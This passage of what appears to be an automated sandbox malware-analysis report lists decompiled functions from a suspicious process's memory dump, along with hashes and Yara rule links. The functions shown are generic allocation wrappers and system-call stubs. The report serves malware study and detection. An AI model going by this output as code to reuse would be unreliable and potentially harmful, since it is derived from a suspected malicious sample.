                                                    • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                    • Instruction Fuzzy Hash: CCC08033080148FBCB126F81CD01F057F2AF754760F004010F5040B571C636D970D744
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8DB40 Relevance: .0, Instructions: 11COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A8DB40() {
				signed int* _t3;
				void* _t5;

				_t3 = L00AA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
				if(_t3 == 0) {
					return 0;
				} else {
					 *_t3 =  *_t3 | 0x00000400;
					return _t3;
				}
			}





                                                    0x00a8db4d
                                                    0x00a8db54
                                                    0x00a8db5f
                                                    0x00a8db56
                                                    0x00a8db56
                                                    0x00a8db5c
                                                    0x00a8db5c

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction ID: 0a35c7edcecc23254a27960d8544844f2eb3ed544cd6fc4e036e9b84293376db
                                                    • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                    • Instruction Fuzzy Hash: 6BC08C30280A40AAEB222F20CE02B0077A0BB42B01F4504A07300DA0F0EBB8DC01E600
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A8AD30 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A8AD30(intOrPtr _a4) {

				return L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}



                                                    0x00a8ad49

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction ID: 3b240b797daf8d457652d88ddb37250374f087ed7d6d0c26a6323fea806869e9
                                                    • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                    • Instruction Fuzzy Hash: A3C02B330C0348BBC7126F45CE01F167F2DE790B60F000020F6040B6B2CA32EC60D588
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A976E2 Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A976E2(void* __ecx) {
				void* _t5;

				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
					return L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
				return _t5;
			}




                                                    0x00a976e4
                                                    0x00000000
                                                    0x00a976f8
                                                    0x00a976fd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction ID: 5ed8d0de574a7ff6143304fb57a423a279c59d78675de40546bb385936635d35
                                                    • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                    • Instruction Fuzzy Hash: 05C08C70269A805AEF2A5708CE21B393690BB08708F48059CBB010A4E2C368BC02C218
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB36CC Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB36CC(void* __ecx) {

				if(__ecx > 0x7fffffff) {
					return 0;
				} else {
					return L00AA4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
				}
			}



                                                    0x00ab36d2
                                                    0x00ab36e8
                                                    0x00ab36d4
                                                    0x00ab36e5
                                                    0x00ab36e5

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction ID: 3607a3fab124ee9f33bd83b0ff3401ba49d8faef31c9cba8819aa20a4c6851ca
                                                    • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                    • Instruction Fuzzy Hash: 2FC02B71150440BBDB152F30CE11F15B358FB41B21F6403547220464F1E7689C00D100
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AA3A1C Relevance: .0, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AA3A1C(intOrPtr _a4) {
				void* _t5;

				return L00AA4620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
			}




                                                    0x00aa3a35

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction ID: bbdbca8dffb01d0b9c99b94ad80cef8c53e7a80f7f73be6bffd63ee88cd63264
                                                    • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                    • Instruction Fuzzy Hash: BDC04C32180648BBC7126E45DD01F15BB69E795B60F154021B6040B5A19676ED61D598
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AA7D50 Relevance: .0, Instructions: 7COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AA7D50() {
				intOrPtr* _t3;

				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t3 != 0) {
					return  *_t3;
				} else {
					return _t3;
				}
			}




                                                    0x00aa7d56
                                                    0x00aa7d5b
                                                    0x00aa7d60
                                                    0x00aa7d5d
                                                    0x00aa7d5d
                                                    0x00aa7d5d

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction ID: 6dd0316b3980bac278b4d8465f675d5d7dccc0b2848bea1154c3675283c6c070
                                                    • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                    • Instruction Fuzzy Hash: 6EB092343019408FCE16DF18C480B1A33E4BB45B40B8400D4E400CBA20D329E8008900
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AB2ACB Relevance: .0, Instructions: 5COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00AB2ACB() {
				void* _t5;

				return E00A9EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
			}




                                                    0x00ab2adc

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction ID: c55814afe809f8b2f1ba5cb9333164bdeb7c6fb2b93da495ffee96f8a564930f
                                                    • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                    • Instruction Fuzzy Hash: 8EB01232E10440CFCF02EF40C710B197371FB00750F058490A00127D32C229AC01CB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC98A0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03c2c12e6da857d2474141b53c91f73d45bae9fffba0998c61129a6de7e592c7
                                                    • Instruction ID: 50715ec7450419745d7ad88530808b1625dba70c6c52bf158108d22a4911f71e
                                                    • Opcode Fuzzy Hash: 03c2c12e6da857d2474141b53c91f73d45bae9fffba0998c61129a6de7e592c7
                                                    • Instruction Fuzzy Hash: E190026535100402D202616944146061009D7D1385F91C023E1424565D86658953F172
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9820 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 934ff10ed9855292ad93f4fe190d29d787c40275f863da1c9f44ba1f2c3c0a28
                                                    • Instruction ID: bb964a608e2ae1fb4613326954d0bf06f6c1028ee43b94858327c99dc23e9d84
                                                    • Opcode Fuzzy Hash: 934ff10ed9855292ad93f4fe190d29d787c40275f863da1c9f44ba1f2c3c0a28
                                                    • Instruction Fuzzy Hash: 5090027529100402D241716944046061009A7D0381F91C023A0424564E86958A56FAA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ACB040 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0abad72a0b830361b383c15de85e6ec05ef8dcecb67f9fb5e563ed491fc69de8
                                                    • Instruction ID: 4e65b696aa7fc3889e9e9c458a98f3fb68dd50c81cabd24ca3008ab78b2e671c
                                                    • Opcode Fuzzy Hash: 0abad72a0b830361b383c15de85e6ec05ef8dcecb67f9fb5e563ed491fc69de8
                                                    • Instruction Fuzzy Hash: AC9002A5651140434640B16948044066015A7E1341791C132A0454570C86A88855E2A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC95F0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c9db78364ffe5c256c54f735010e00b0c831ccd2abcba4075ce32ea76d8a0ea
                                                    • Instruction ID: 03eb5c94bea1d270686b27ef1fb8e5562f6b24b72aebd07de827eaa7154265bd
                                                    • Opcode Fuzzy Hash: 5c9db78364ffe5c256c54f735010e00b0c831ccd2abcba4075ce32ea76d8a0ea
                                                    • Instruction Fuzzy Hash: 8C90027525100802D20461694804686100597D0341F51C022A6024665E96A58891B171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC99D0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: dc8006e4386650b1b7e96f204f07cd33309ac74bf8635c4a75adb418057c9696
                                                    • Instruction ID: d9f2746649889e481dd8003ef33e1afcfe47d8959f0d3614ac0cc9f5b37be697
                                                    • Opcode Fuzzy Hash: dc8006e4386650b1b7e96f204f07cd33309ac74bf8635c4a75adb418057c9696
                                                    • Instruction Fuzzy Hash: 1D9002A526100042D20461694404706104597E1341F51C023A2154564CC5698C61A165
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f56d09d15942aafc4160f43664c51c6672d5b9473518780964f095c34b6649c
                                                    • Instruction ID: 7bf0f105a1835c3b2790d97d0d52ae50c251844a134d1f6967268721e24e1ca3
                                                    • Opcode Fuzzy Hash: 5f56d09d15942aafc4160f43664c51c6672d5b9473518780964f095c34b6649c
                                                    • Instruction Fuzzy Hash: C29002E5251140924600A2698404B0A550597E0341F51C027E1054570CC5658851E175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ACAD30 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b7ec59f1d49e331b322d5606a14100ed85ac5d7ce219ed783eaf83340992ef3a
                                                    • Instruction ID: a8f879e7ec1a70e9058bc2717183a513ecb412dd80296b189915ecd5542cf7d7
                                                    • Opcode Fuzzy Hash: b7ec59f1d49e331b322d5606a14100ed85ac5d7ce219ed783eaf83340992ef3a
                                                    • Instruction Fuzzy Hash: A2900275A55000129240716948146465006A7E0781F55C022A0514564C89948A55A3E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9560 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: caf9c15c299bb4b8bf222236727eb37698fa0ed9ad40a793a1d152b12fd682d2
                                                    • Instruction ID: b88bae39a389be1eaf8818fcb179f2c3d5f72d2a494b49dacb5559f8b64c889a
                                                    • Opcode Fuzzy Hash: caf9c15c299bb4b8bf222236727eb37698fa0ed9ad40a793a1d152b12fd682d2
                                                    • Instruction Fuzzy Hash: 87900269271000020245A569060450B1445A7D6391791C026F14165A0CC6618865A361
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9950 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8d834338ee4cfee2dc7c753aec1aee4cc7f215662ef6365a5dce341c9ccfc0be
                                                    • Instruction ID: f52a2d325d08e5038e1586fb6665cb3a83b2562f83c6555c441903443202ca61
                                                    • Opcode Fuzzy Hash: 8d834338ee4cfee2dc7c753aec1aee4cc7f215662ef6365a5dce341c9ccfc0be
                                                    • Instruction Fuzzy Hash: 4E9002A525140403D24065694804607100597D0342F51C022A2064565E8A698C51B175
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9A80 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b70079c92275d842a0065bd80a91cadc627499569feca603810f84d1805d6af8
                                                    • Instruction ID: 4e33845e73c4518cf421cc38428d06e6f7f53631a88fe47200f976b62b7f77d5
                                                    • Opcode Fuzzy Hash: b70079c92275d842a0065bd80a91cadc627499569feca603810f84d1805d6af8
                                                    • Instruction Fuzzy Hash: F490026525144442D24062694804B0F510597E1342F91C02AA4156564CC9558855A761
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC96D0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 150b5a075657cb478b05f0e972c733eb891851153b359f3a44cb589731f31585
                                                    • Instruction ID: 3daf4fe9115929a16542e9b556d423a69ed97acf74e5043e7d8ca4095a42789b
                                                    • Opcode Fuzzy Hash: 150b5a075657cb478b05f0e972c733eb891851153b359f3a44cb589731f31585
                                                    • Instruction Fuzzy Hash: BC90027525100842D20061694404B46100597E0341F51C027A0124664D8655C851B561
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9A10 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 843006375817b06bf6357f09113a6dc90ac333834da3e1a8a5e0456364eeb7b4
                                                    • Instruction ID: 41d56e4a0189083039d7dbc5992998f8cdf21576cd027ea05581619d103094e6
                                                    • Opcode Fuzzy Hash: 843006375817b06bf6357f09113a6dc90ac333834da3e1a8a5e0456364eeb7b4
                                                    • Instruction Fuzzy Hash: 5590027525140402D20061694808747100597D0342F51C022A5164565E86A5C891B571
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9610 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b782014bdedc1676157ce5b8c6f68a997e1a909ecbd7a458ad050df07fe4be78
                                                    • Instruction ID: 7f761bcc3c2090dc4e9cbe9eb9bac5a205a632ce6366535dd29564df1cef3d28
                                                    • Opcode Fuzzy Hash: b782014bdedc1676157ce5b8c6f68a997e1a909ecbd7a458ad050df07fe4be78
                                                    • Instruction Fuzzy Hash: 3890027565500802D25071694414746100597D0341F51C022A0024664D87958A55B6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9650 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e2cd4c5e1135e2d53eb2ae8bd311e47c5c69492d80d2e9062b43aa5d4e307263
                                                    • Instruction ID: d7acd788b2a29f100ec41135dafa82b16f986fed5ffc51701c14efe99f64de25
                                                    • Opcode Fuzzy Hash: e2cd4c5e1135e2d53eb2ae8bd311e47c5c69492d80d2e9062b43aa5d4e307263
                                                    • Instruction Fuzzy Hash: C590027525504842D24071694404A46101597D0345F51C022A00646A4D96658D55F6A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ACA3B0 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a5bdeff95f97ee4cc58bb9b7a565c6313923b578c604aa8034db8f4cb86217d
                                                    • Instruction ID: 88c880201b1d1c18b9924c59945e7724dd45abf9b2778c5d6ff134b0b2b3c3b4
                                                    • Opcode Fuzzy Hash: 8a5bdeff95f97ee4cc58bb9b7a565c6313923b578c604aa8034db8f4cb86217d
                                                    • Instruction Fuzzy Hash: 4F90027525144002D2407169844460B6005A7E0341F51C422E0425564C86558856E261
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9730 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c14cfdde67c7fa2889312261204f3a884b648aad928350086c2531331e921979
                                                    • Instruction ID: c93930120af85f997d092a2d5285e191c8d0d69c9e2968ce71e3cbb09cf6cb23
                                                    • Opcode Fuzzy Hash: c14cfdde67c7fa2889312261204f3a884b648aad928350086c2531331e921979
                                                    • Instruction Fuzzy Hash: 5D90026565500402D24071695418706101597D0341F51D022A0024564DC6998A55B6E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9B00 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2003a09ceb37d97045a439ee8c2ba9976008b071474ba903ee42863cb8606566
                                                    • Instruction ID: 544dedbf5785fb387949e843da9dfe9357ab4217f80bf9ba45364618e931e710
                                                    • Opcode Fuzzy Hash: 2003a09ceb37d97045a439ee8c2ba9976008b071474ba903ee42863cb8606566
                                                    • Instruction Fuzzy Hash: FB90026529100802D240716984147071006D7D0741F51C022A0024564D86568965B6F1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ACA710 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a2cc47e18b5a28de99ed3b724327b4a105893306bca779dcdbe03c688c366efb
                                                    • Instruction ID: e2fe6090166687929f61ee6f60ba8ab53d39f19f875100c24aa4f7f7b80a9ff6
                                                    • Opcode Fuzzy Hash: a2cc47e18b5a28de99ed3b724327b4a105893306bca779dcdbe03c688c366efb
                                                    • Instruction Fuzzy Hash: F1900275351000529600A6A95804A4A510597F0341F51D026A4014564C85948861A161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9760 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5fd6b9562ab2a016ce9c2a2f68d56efa5b3f6bf0df56649b304799786074274b
                                                    • Instruction ID: c1f13e513900232cbd79ee8c0ab79cd5439ffb9081eaaf7e55345488f035db52
                                                    • Opcode Fuzzy Hash: 5fd6b9562ab2a016ce9c2a2f68d56efa5b3f6bf0df56649b304799786074274b
                                                    • Instruction Fuzzy Hash: 4790027525100403D20061695508707100597D0341F51D422A0424568DD6968851B161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9770 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9858b55f192dea5d6007a2827dfd5ad25f272eb1610f11e93ceeef151878b92
                                                    • Instruction ID: ff978a9633e26aee0f3177da750ffb44ae941ec073f87de8089cbeabf824f45a
                                                    • Opcode Fuzzy Hash: f9858b55f192dea5d6007a2827dfd5ad25f272eb1610f11e93ceeef151878b92
                                                    • Instruction Fuzzy Hash: DC90026525504442D20065695408A06100597D0345F51D022A10645A5DC6758851F171
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ACA770 Relevance: .0, Instructions: 4COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d693e3c079abca25a7a99de9199e01112df6fd24329a1666859a54ded713b056
                                                    • Instruction ID: e9e957ca9ee1fc093173c473e039bd5629c37cd64b02de064d984446531cca20
                                                    • Opcode Fuzzy Hash: d693e3c079abca25a7a99de9199e01112df6fd24329a1666859a54ded713b056
                                                    • Instruction Fuzzy Hash: 7E90027925504442D60065695804A87100597D0345F51D422A04245ACD86948861F161
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00AC9670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
